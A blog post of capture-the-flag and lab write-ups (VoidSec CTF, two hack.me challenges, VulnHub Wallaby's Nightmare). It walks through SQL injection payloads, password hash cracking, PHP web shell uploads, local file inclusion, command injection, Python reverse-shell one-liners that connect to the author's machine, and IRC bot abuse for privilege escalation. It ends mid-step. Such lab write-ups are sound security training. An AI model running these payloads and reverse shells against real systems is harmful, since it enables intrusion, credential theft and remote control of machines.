[CTF] VoidSec CTF

I’m sorry for the big delay, but I was busy with exams in this period and didn’t have time to write posts on my blog. Today I want to show you the writeup of an awesome CTF: http://ctf.voidsec.com.

Information Gathering

First of all I launched a scan with nmap:

nmap ctf.voidsec.com -sS -p 1-65535

After some time (a lot of time) I found the open ports:

PORT      STATE    SERVICE 
22/tcp    open     ssh 
54/tcp    filtered xns-ch 
111/tcp   open     rpcbind 
8332/tcp  filtered unknown 
8333/tcp  filtered bitcoin 
9332/tcp  filtered unknown 
9333/tcp  filtered litecoin 
9987/tcp  filtered dsm-scm-target 
51065/tcp open     unknown 
62222/tcp open     unknown 
65324/tcp open     unknown

I tried to browse to http://ctf.voidsec.com:65324 and realized that I had found the HTTP port. I clicked on the big START button, which showed me a popup that said:

Back in my days I used to start with a bit of healthy Information Gathering

Ok, let’s do this information gathering.
First of all I bruteforced directories and files with the dirbuster wordlist directory-list-2.3-medium.txt and found the /backup-recovery folder. Directory listing was enabled, and I downloaded the only file inside it (userlist.bak). I also found the /include folder and, bruteforcing file names there, config.php.bak, which contained a hash salt: 3f42

Finally I took a look at robots.txt and found the admin login portal directory: /eLprZw6c. When I tried to access it I got a 403 error:

Error 403 - Forbidden

This interface is only accessible from: 144.11.32.239

Your IP Address: 79.30.175.53

To bypass this I changed the admin_ip cookie value to 144.11.32.239.

Bruteforcing is your friend

I moved to the registration page (http://ctf.voidsec.com:65324/register.php) and noticed that, when choosing a username, the page told me whether that username was already taken. So I intercepted the request (an AJAX one) with Burp Suite and bruteforced usernames with the .bak file downloaded earlier. In the end I found only one valid username: sukumar. Then I bruteforced the password with Burp Suite against the login form and found trustno1.

Cookie Injection

Now that I was logged in as sukumar I explored the page: there was a dashboard with a disabled comments section. I tried to enable it, but that was not the right path. Then I found a new cookie, secure_club:

c3VrdW1hcjpOeklnTmpVZ05tUWdOalVnTm1RZ05qSWdOalVnTnpJZ05XWWdObVFnTmpVPTowOjE0ODY4OTkwNTE%3D

I URL-decoded it and then base64-decoded it, and found this:

sukumar:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

Then I tested whether the cookie was vulnerable to SQL injection:

sukumar' OR 1=1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

I re-encoded it and refreshed the page. Now the username sukumar, shown in the top-left menu, was replaced by Without pain, so the cookie was injectable. First of all I found the number of columns:

sukumar' GROUP BY 1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 2#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 3#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 4#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 5#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 6#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

Up to GROUP BY 5 the page rendered correctly, but with 6 the username and email were blank, so I concluded that the query returns only 5 columns. Then I found the vulnerable columns:

s' UNION ALL SELECT 1,2,3,4,5#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

The numbers 2 and 5 were displayed on the page, so I could use those two columns to dump the database:

s' UNION ALL SELECT 1,database(),3,4,user()#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

I got this:

ctf
ctf_user@localhost
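To make the cookie and the injection concrete, here is an added example (not from the writeup) that unpacks the secure_club value shown above and contrasts the concatenated lookup that made it injectable with a parameterized one; sqlite3 stands in for the target’s MySQL, so the injected tail uses the `-- ` comment both engines accept rather than MySQL’s `#`, and the three user rows are constructed.

```python
"""Decode the secure_club cookie and compare an injectable lookup with a
parameterized one. Added example; sqlite3 stands in for the target's MySQL."""
import base64
import sqlite3
import urllib.parse

# Cookie value captured in the writeup (URL-encoded base64).
SECURE_CLUB = ("c3VrdW1hcjpOeklnTmpVZ05tUWdOalVnTm1RZ05qSWdOalVnTnpJZ05XWWdObVFnTmpVPTow"
               "OjE0ODY4OTkwNTE%3D")


def decode_secure_club(cookie: str) -> dict:
    """URL-decode, base64-decode and split the 'user:flag:n:timestamp' cookie.

    The second field is itself base64 of space-separated hex byte values."""
    raw = base64.b64decode(urllib.parse.unquote(cookie)).decode()
    username, flag_b64, n, ts = raw.split(":")
    hex_bytes = base64.b64decode(flag_b64).decode().split()
    return {
        "username": username,
        "flag": bytes.fromhex("".join(hex_bytes)).decode(),
        "n": int(n),
        "ts": int(ts),
    }


def make_db() -> sqlite3.Connection:
    """Constructed users table mirroring the five columns found in the CTF."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, type TEXT, "
                 "password TEXT, mail TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "Without pain", "user", "x", "a@example.invalid"),   # constructed
        (2, "sukumar", "user", "x", "b@example.invalid"),        # constructed
        (3, "tyler", "admin", "x", "c@example.invalid"),         # constructed
    ])
    return conn


def lookup_unsafe(conn, username: str) -> list:
    """How the page behaved: the cookie field is concatenated straight into SQL,
    so a quote in it ends the literal and the rest becomes SQL."""
    sql = ("SELECT id, username, type, password, mail FROM users "
           f"WHERE username = '{username}'")
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username: str) -> list:
    """Parameterized: the value travels separately from the SQL text, so the
    same string is only ever compared, never parsed."""
    sql = "SELECT id, username, type, password, mail FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


if __name__ == "__main__":
    print(decode_secure_club(SECURE_CLUB))
    conn = make_db()
    injected = "sukumar' OR 1=1-- "          # '-- ' instead of MySQL-only '#'
    print(lookup_unsafe(conn, injected))     # every row; first username is shown
    print(lookup_safe(conn, injected))       # []: nobody is literally named that
```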

Then I found the table names:

s' UNION ALL SELECT 1,table_name,3,4,5 FROM information_schema.tables WHERE table_schema = database() LIMIT 0,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,table_name,3,4,5 FROM information_schema.tables WHERE table_schema = database() LIMIT 1,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,table_name,3,4,5 FROM information_schema.tables WHERE table_schema = database() LIMIT 2,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

So, the tables are:

comments
users
usersonline

The users table was the one that interested me, so I enumerated its column names:

s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 0,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 1,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 2,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 3,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 4,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

The columns of table users are:

id
username
type
password
mail

Then I dumped the admin row (username, password hash and mail):

s' UNION ALL SELECT 1,CONCAT(username, '~', password, '~', mail),3,4,5 FROM users LIMIT 9,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

This is the output:

tyler~b9e45646f4d582b700c59c0211eedc6c~tylerdurden@mayhem.com

Ok, now I needed to crack the hash. hash-identifier suggested it could be MD5($salt.$pass), so I created a file with the hash and the salt:

b9e45646f4d582b700c59c0211eedc6c:3f42

Also, clicking on “Forgot your password?” on the admin portal login, I found the password rules:

Remember, your new password must:

- start with _
- use only this charset [a-z][A-Z][0-9]
- be max 8 char length

So I performed a mask attack with hashcat (the hash file comes before the mask on the command line):

optirun hashcat -a 3 -m 20 -1 _ -2 ?l?u?d hash.txt ?1?2?2?2?2?2?2?2

After some minutes I found the password: _Kr4K3n0.
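To see why the portal’s own rules (leading underscore, alphanumerics only, at most 8 characters) leave so little work for a mask attack, here is an added example, not from the writeup, that computes the keyspace of the hashcat mask above and checks a candidate against an md5($salt.$pass) hash (hashcat mode 20); the 10 GH/s rate is an assumed figure for illustration.

```python
"""Keyspace of a hashcat mask with custom charsets, plus md5($salt.$pass)
verification. Added example; salt 3f42 and the mask come from the writeup."""
import hashlib
import re

# hashcat built-in charsets and their sizes
BUILTIN = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95}


def charset_size(definition: str) -> int:
    """Size of a custom charset such as '?l?u?d' or '_'.

    Each '?x' adds the built-in set's size; any other character adds one."""
    size = 0
    for tok in re.findall(r"\?.|.", definition):
        size += BUILTIN[tok[1]] if tok.startswith("?") else 1
    return size


def mask_keyspace(mask: str, custom: dict) -> int:
    """Number of candidates a mask generates: product of per-position sizes.

    custom maps the digit of '?1'..'?4' to its charset definition."""
    total = 1
    for tok in re.findall(r"\?.|.", mask):
        if not tok.startswith("?"):
            continue                     # literal character: a single choice
        c = tok[1]
        total *= charset_size(custom[c]) if c in custom else BUILTIN[c]
    return total


def salted_md5(salt: str, password: str) -> str:
    """hashcat mode 20 is md5($salt.$pass): the salt is prepended, then hashed."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def check_candidate(salt: str, stored_hash: str, candidate: str) -> bool:
    """What every guess in the attack boils down to: one fast MD5 and a compare."""
    return salted_md5(salt, candidate) == stored_hash


def seconds_to_exhaust(keyspace: int, hashes_per_second: float) -> float:
    """Worst-case time to try every candidate at a given hashing rate."""
    return keyspace / hashes_per_second


if __name__ == "__main__":
    # Policy from the portal: starts with '_', then [a-zA-Z0-9], max 8 chars,
    # so the 8-character mask is '_' followed by seven positions of 62 symbols.
    custom = {"1": "_", "2": "?l?u?d"}
    ks = mask_keyspace("?1?2?2?2?2?2?2?2", custom)
    print(ks)                                      # 3521614606208 == 62**7
    # Assumed 10 GH/s GPU rate (constructed figure, for illustration only).
    print(seconds_to_exhaust(ks, 10e9) / 60, "minutes worst case")
    h = salted_md5("3f42", "_Kr4K3n0")
    print(check_candidate("3f42", h, "_Kr4K3n0"))  # True
```

Shorter passwords allowed by the same policy add only 62**6 and below, so the 8-character mask dominates the total work.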

Give me a reverse shell!

Once logged in with the admin credentials I found an upload form in the settings menu, top-right of the dashboard. It accepts only .xml files, but I tried to upload a PHP shell anyway:

POST /eLprZw6c/upload.php HTTP/1.1
Host: ctf.voidsec.com:65324
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ctf.voidsec.com:65324/eLprZw6c/settings.php
Cookie: __cfduid=df50c6365654161b804e8cbafbfbd1ccc1486652943; __utma=225611421.1379856735.1486652948.1486652948.1486850440.2; __utmz=225611421.1486652948.1.1.utmcsr=ctf.voidsec.com:65324|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; secure_club=cycgVU5JT04gQUxMIFNFTEVDVCAxLENPTkNBVCh1c2VybmFtZSwgJ34nLCBwYXNzd29yZCwgJ34nLCBtYWlsKSwzLDQsNSBGUk9NIHVzZXJzIExJTUlUIDksMSM6TnpJZ05qVWdObVFnTmpVZ05tUWdOaklnTmpVZ056SWdOV1lnTm1RZ05qVT06MDoxNDg2ODk5MDUx; admin_ip=144.11.32.239; PHPSESSID=tqo38cmsghq0q2msd1to1sp115
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------178431310316686449931498616622
Content-Length: 250

-----------------------------178431310316686449931498616622
Content-Disposition: form-data; name="file"; filename="shell.php;.xml"
Content-Type: text/xml



-----------------------------178431310316686449931498616622--

After the upload the “XML” was processed and I got a reverse shell on my box! Then I browsed to /zCTF-END-HERE and read the END.txt file.
CTF completed!


[HACKME] BeachResort

Another CTF by decoder-ap. To complete it I need to answer these questions:
1) What is the CMS administrator’s username?
2) What is the db name?
3) List the table names.
4) List all the files stored in the root directory of superCMS admin site.
5) What is the license key?
6) List the contents of a very super secret file.

ANALYZING THE TARGET

When I opened my sandbox I saw the static HTML website of the BeachResort. It was built with SuperCMS (a fictitious name), which is in beta, so it may well be vulnerable to something. Looking at the SuperCMS banner URL at the bottom of the page I discovered a hidden folder, cmsadm, but browsing to it gave a 403 error. So there is no index page in the admin panel and I needed to guess its files.

EXPLOITATION

After some research I discovered the login panel: cmsadm/login.php. There was a login form with a username and a password. I tested it for SQL injection with sqlmap and it was exploitable, but I performed the injection manually. First of all I tried appending a single quote to the username parameter, but nothing happened; then I tried a UNION-based SQLi:

user' UNION ALL SELECT 1-- -

And it worked! Note that there is only one column to inject into. Then I found the database name:

user' UNION ALL SELECT database()-- -

This is the output:

supercms 

Then I discovered the table names:

user' UNION ALL SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1-- -

I stepped the LIMIT offset from 0 to 2 and retrieved the three tables of the supercms database:

groups
license
operators

Then I retrieved the column names of the operators table:

user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 0,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 1,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 2,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 3,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='operators' LIMIT 4,1-- -

And I got:

id
username
password
firstname
lastname

Then I dumped data from the operators table:

user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 0, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 1, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 2, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 3, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 4, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 5, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 6, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 7, 1-- -
user' UNION ALL SELECT CONCAT(username, ' ', password) FROM operators LIMIT 8, 1-- -

This is the output:

andrew 5f4dcc3b5aa765d61d8327deb882cf99
beatrice 5f4dcc3b5aa765d61d8327deb882cf99
arnold 5f4dcc3b5aa765d61d8327deb882cf99
barbara 5f4dcc3b5aa765d61d8327deb882cf99
eva 5f4dcc3b5aa765d61d8327deb882cf99
test1 5f4dcc3b5aa765d61d8327deb882cf99
test2 5f4dcc3b5aa765d61d8327deb882cf99
test3 5f4dcc3b5aa765d61d8327deb882cf99
cmsadmin 2bfea2ff114ccd30d95e176a1d25346a

Now I retrieved the license key:

user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='license' LIMIT 0,1-- -
user' UNION ALL SELECT column_name FROM information_schema.columns WHERE table_name='license' LIMIT 1,1-- -

The output:

id
license_key

Then:

user' UNION ALL SELECT license_key FROM license LIMIT 0, 1-- -

And I got the license key. Then I logged in as cmsadmin:

cmsadmin'-- -

Then I clicked on the “Upload Image File” link, set up Burp Suite as a proxy and uploaded a .gif file, editing the content of the fake image to:

GIF89a

Then I changed the extension to .gif.php and forwarded the request. The upload succeeded and I browsed to /images/shell.gif.php, from where I could execute arbitrary PHP code. First of all I listed the content of the cmsadm folder:

/images/shell.gif.php?cmd=print_r(scandir('../cmsadm'));

And I got this:

add_page.php
css
images
include
js
login.php
menu.php
scripts
secret.noop
update_page.php
upload.php

Then I read the secret file:

/images/shell.gif.php?cmd=echo readfile('../cmsadm/secret.noop');

CTF completed!


[HACKME] Hack_My_Microblog

I start the Hack.me series today with a challenge made by a friend (decoder-ap): https://hack.me/102464/hack-my-microblog12.html. The objective is to find a secret key hidden in the website.

ANALYZING THE TARGET

When I started the sandbox I had a submit form with two input fields: the first one for my nickname, the second one for some free text. I tried to see whether it was vulnerable to SQLi by appending a single quote to the first field, but I just got redirected to the same page. When I did the same with the second field I got:

Ops..r u trying to hack me? hope this helps =>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 2

Cool! Let’s exploit this SQLi.

EXPLOITATION

I assumed that the SQL query was an INSERT, and after some research I found an interesting PDF on Exploit-DB. I used the updatexml() function to exploit the SQLi. First of all I found the MySQL version:

' or updatexml(1, concat(0x7e, (version())), 0) or '

And I got:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~5.1.65-community-log'

So the MySQL version is 5.1.65. Now I checked the tables:

' or updatexml(0, concat(0x7e, (SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)), 0) or '

This was the output:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~comments_text'

The first table I found is comments_text. Since I used LIMIT, I increased the offset to check whether there are more tables than this one:

' or updatexml(0, concat(0x7e, (SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)), 0) or '

The output:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~secret'

Bingo! Now I retrieved the columns names:

' or updatexml(0, concat(0x7e, (SELECT concat(column_name) FROM information_schema.columns WHERE table_name='secret' LIMIT 0,1)), 0) or '

I got the first field:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~userid'

Then I increased the LIMIT offset:

' or updatexml(0, concat(0x7e, (SELECT concat(column_name) FROM information_schema.columns WHERE table_name='secret' LIMIT 1,1)), 0) or '

I got the second value:

Ops..r u trying to hack me? hope this helps =>XPATH syntax error: '~secretkey'

Now I just extracted data:

' or updatexml(0, concat(0x7e, (SELECT concat_ws(':', userid, secretkey) FROM secret LIMIT 0,1)), 0) or '

And I got the key!


[VULNHUB] Wallaby’s: Nightmare (1.0.2)

This VM is really awesome, especially the privilege escalation part! Let’s hack it!

RCE IS YOUR FRIEND

First of all I discovered the open ports of the VM:

nmap 192.168.1.11 -p 1-65535

And I got this:

Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-03 18:59 CET
Nmap scan report for 192.168.1.11
Host is up (0.0081s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
6667/tcp filtered irc

Nmap done: 1 IP address (1 host up) scanned in 3.17 seconds

I browsed to http://192.168.1.11 and I found a submit form which said:

Enter a username to get started with this CTF! 

Cool, I typed ReverseBrain and pressed the submit button. I got redirected to a page with some tips; at the end of the page there was a link to start the VM. I clicked Start the CTF! and was redirected to http://192.168.1.11/?page=home. The first thing I tried was an LFI on the page parameter: http://192.168.1.11/?page=../../../../../../etc/passwd and I got:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
walfin:x:1000:1000:walfin,,,:/home/walfin:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false
steven?:x:1001:1001::/home/steven?:/bin/bash
ircd:x:1003:1003:,,,:/home/ircd:/bin/bash

It seemed that the LFI worked! Looking into the source code of the page I noticed an HTML comment:

This is what we call 'dis-information' in the cyber security world!  Are you learning anything new here ReverseBrain

Grrrr, it was a honeypot… Let’s see whether the same trick works on /etc/shadow (http://192.168.1.11/?page=../../../../../../etc/shadow), but I got this:

That's some fishy stuff you're trying there ReverseBrain buddy. You must think Wallaby codes like a monkey! I better get to securing this SQLi though...

(Wallaby caught you trying an LFI, you gotta be sneakier! Difficulty level has increased.)

Then I tried to navigate around the website, but it seemed that port 80 was closed. So I re-ran the nmap scan:

nmap 192.168.1.11 -p 1-65535

And I discovered that the web server switched to another port:

Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-03 19:10 CET
Nmap scan report for 192.168.1.11
Host is up (0.0082s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
6667/tcp  filtered irc
60080/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 3.15 seconds

So I browsed to http://192.168.1.11:60080/ and on the new web page there was an image and a sentence which said:

HOLY MOLY, this guy ReverseBrain wants me...Glad I moved to a different port so I could work more securely!!!

Eheheheh, now I tried to bruteforce the pages. I browsed to http://192.168.1.11:60080/?page=test and got an error:

Dude, ReverseBrain what are you trying over here?!

Then I reloaded the page intercepting the GET request with Burp Suite and sent it to Intruder with the following payload position:

GET /?page=§test§ HTTP/1.1
Host: 192.168.1.11:60080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

I used raft-small-directories-lowercase.txt as wordlist and found index, home, mailer and blacklist. I browsed to http://192.168.1.11:60080/?page=mailer and there was only a blue Coming soon guys! header. In the source code I found a comment which said:

/?page=mailer&mail=mail wallaby "message goes here"

So I checked whether the mail parameter was vulnerable to command injection (RCE) by requesting http://192.168.1.11:60080/?page=mailer&mail=id, and I got:

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Cool! Now I could get a reverse shell. First of all I started a local listener:

nc -lvp 1234

Then I typed:

http://192.168.1.11:60080/?page=mailer&mail=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.1.14",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now I had a reverse shell, and I upgraded it to a TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Now I needed to escalate privileges.

TAKE CARE ABOUT THE IRC BOTS!

First of all I tried:

sudo -l

This is the output:

Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (waldo) NOPASSWD: /usr/bin/vim /etc/apache2/sites-available/000-default.conf
    (ALL) NOPASSWD: /sbin/iptables

So I could modify iptables as root. I took a look at the processes too:

waldo      727  0.0  0.5  29416  2924 ?        Ss   09:55   0:00 tmux new-session -d -s irssi
waldo      729  0.0  0.1   4508   700 pts/0    Ss   09:55   0:00 -sh
waldo      749  0.0  1.7 115744  8520 pts/0    Sl+  09:55   0:00 irssi
wallaby    977  0.0  4.9 516868 24964 ?        Sl   09:55   0:00 /usr/bin/python3 /usr/bin/sopel -d --quiet

It seems that waldo is connected to the IRC server, which is not reachable from the external network, and that there is also an IRC bot built with Sopel and started by wallaby. First of all I checked the iptables rules:

Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     tcp  --  127.0.0.1            0.0.0.0/0            tcp dpt:6667
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:6667

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination 

As I suspected, iptables drops requests to IRC port 6667 from any source except localhost. I removed this rule and added a new one:

sudo iptables -D INPUT -p tcp -m tcp --dport 6667 -j DROP
sudo iptables -A INPUT -p tcp -s 0.0.0.0 --dport 6667 -j ACCEPT

Now I could connect to the IRC server from HexChat, which is already installed on my Kali box. I added a new server called CTF with IP/port 192.168.1.11/6667. I found the only available channel, #wallabyschat (from irssi inside the exploited VM), so I joined it:

/join #wallabyschat

There were 3 users: me, waldo (who was the channel operator) and wallabysbot. The bot is built with Sopel, which accepts a lot of commands, including .run. I typed it and got a response from the bot:

Hold on, you aren't Waldo?

I looked into the command by browsing to /home/wallaby/.sopel/modules, where I found run.py:

import sopel.module, subprocess, os
from sopel.module import example

@sopel.module.commands('run')
@example('.run ls')
def run(bot, trigger):
     if trigger.owner:
          os.system('%s' % trigger.group(2))
          runas1 = subprocess.Popen('%s' % trigger.group(2), stdout=subprocess.PIPE).communicate()[0]
          runas = str(runas1)
          bot.say(' '.join(runas.split('\\n')))
     else:
          bot.say('Hold on, you aren\'t Waldo?')
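The weakness in run.py is that `trigger.owner` is satisfied by whoever currently holds the owner’s nick, and the text after `.run` then goes straight to a shell. Here is an added example (not from the VM or from Sopel) of the same decision done defensively; the Trigger class is a stand-in for Sopel’s trigger object, and OWNER_ACCOUNT and the ALLOWED table are assumptions.

```python
"""Nick-based authorization versus account-based authorization plus an
allowlist. Added example; Trigger is a stand-in, not Sopel's API."""
import shlex
import subprocess
from dataclasses import dataclass
from typing import List, Optional, Tuple

OWNER_NICK = "waldo"        # what the original check effectively trusts
OWNER_ACCOUNT = "waldo"     # services account the owner identifies to (assumption)
# Fixed argv per allowed keyword: the operator's text never reaches a shell.
ALLOWED = {"uptime": ["uptime"], "date": ["date", "-u"]}


@dataclass
class Trigger:
    nick: str               # current IRC nick; anyone can claim it once it is free
    account: Optional[str]  # authenticated services account, None if not identified
    args: str               # text that followed ".run"


def owner_by_nick(t: Trigger) -> bool:
    """Original logic: trust the nick. True for anyone who takes over the nick,
    which is exactly what happened once the real waldo timed out."""
    return t.nick == OWNER_NICK


def authorize(t: Trigger) -> Tuple[bool, str, List[str]]:
    """Hardened decision: an authenticated account AND an allowlisted command.

    Returns (ok, reason, argv to execute)."""
    if t.account is None or t.account != OWNER_ACCOUNT:
        return False, "not authenticated as owner", []
    try:
        words = shlex.split(t.args)
    except ValueError:
        return False, "unparseable arguments", []
    if len(words) != 1 or words[0] not in ALLOWED:
        return False, "command not allowlisted", []
    return True, "ok", ALLOWED[words[0]]


def run_hardened(t: Trigger) -> str:
    """What the bot would say back: a refusal, or bounded output of a fixed argv."""
    ok, reason, argv = authorize(t)
    if not ok:
        return "Hold on, " + reason
    # list argv, no shell=True, bounded runtime
    out = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return " ".join(out.stdout.split())


if __name__ == "__main__":
    spoofed = Trigger(nick="waldo", account=None, args="id")
    print(owner_by_nick(spoofed))          # True: the nick check alone is fooled
    print(run_hardened(spoofed))           # refused: no authenticated account
    real = Trigger(nick="waldo", account="waldo", args="python -c 'print(1)'")
    print(run_hardened(real))              # refused: not allowlisted
    print(run_hardened(Trigger("waldo", "waldo", "date")))
```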

Nice! There is an RCE vulnerability, but I needed to be recognized as waldo first. So I edited iptables:

sudo iptables -D INPUT -s 127.0.0.1/32 -p tcp -m tcp --dport 6667 -j ACCEPT
sudo iptables -A OUTPUT -o enp0s17 -s 127.0.0.1 -p tcp --dport 6667 -m owner --uid-owner waldo -j DROP

After some minutes waldo got a timeout error. After that I changed my nick:

/nick waldo

Now I exploited the RCE vulnerability:

.run id

It worked! I started another local listener:

nc -lvp 1235

Then I sent the bot this string:

.run python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.14",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now I had a second reverse shell, as wallaby. I got a TTY and typed:

sudo -l

This is the output:

Matching Defaults entries for wallaby on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wallaby may run the following commands on ubuntu:
    (ALL) NOPASSWD: ALL

I could run all commands with sudo. So I typed:

export TERM=xterm
sudo vi

Then I pressed ESC to enter command mode and pressed ENTER. Then I started a local listener:

nc -lvp 1236

Then from vi I typed:

